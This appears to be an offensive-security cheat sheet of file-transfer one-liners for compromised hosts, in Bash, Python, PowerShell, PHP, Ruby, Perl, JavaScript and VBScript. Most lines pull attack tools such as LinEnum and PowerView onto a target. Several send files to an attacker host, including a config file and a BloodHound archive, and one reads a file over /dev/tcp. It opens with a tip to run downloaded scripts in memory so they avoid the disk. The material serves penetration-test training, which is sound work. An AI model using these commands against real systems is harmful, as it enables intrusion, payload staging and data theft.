Links

Code

Useful code for transferring files.
Consider piping downloaded binaries and scripts into something like bash or python to execute in memory rather than downloading them to the target.

Bash

This option is useful when certain binary options are limited on the target. Bash can be used to receive files on the target when sent by binaries on the attacker.
# Receive the file sent by the attacker
cat < /dev/tcp/<KALI IP>/443 > LinEnum.sh

Python2

Useful when Python3 isn't available on a target
# Download a file
python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

Python3

# Upload a file. Don't change 'rb'
python3 -c 'import requests;requests.post("http://192.168.127.134:8000/upload",files={"files":open("./mysql.conf","rb")})'
# Download a file.
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

PowerShell

# Download remote file from host
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\bob\Desktop\wget.exe')"
# Download remote file from host
Invoke-WebRequest http://192.168.127.134:8000/mysql.conf -OutFile .\mysql.conf
# Download remote file from host
Import-Module BitsTransfer; Start-BitsTransfer -Source http://192.168.127.134:8000/mysql.conf -Destination .\mysql.conf
# Upload file
Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://10.10.10.132/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql
# Upload local file to remote host
powershell (New-Object System.Net.WebClient).UploadFile('http://KALI IP/upload.php', 'fileToCopyToKali.docx')

PHP

# Download a file with file_get_contents & file_put_contents
php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
# Download a file with Fopen()
php -r 'const BUFFER = 1024; $fremote =
fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

Ruby

# Download a file
ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'

Perl

# Download a file
perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'

JavaScript

# Create a file
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));
# Download a file using cscript to run js
cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1

VBScript

# Create a file
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile WScript.Arguments.Item(1), 2
end with
# Download file using cscript to run vbs
cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1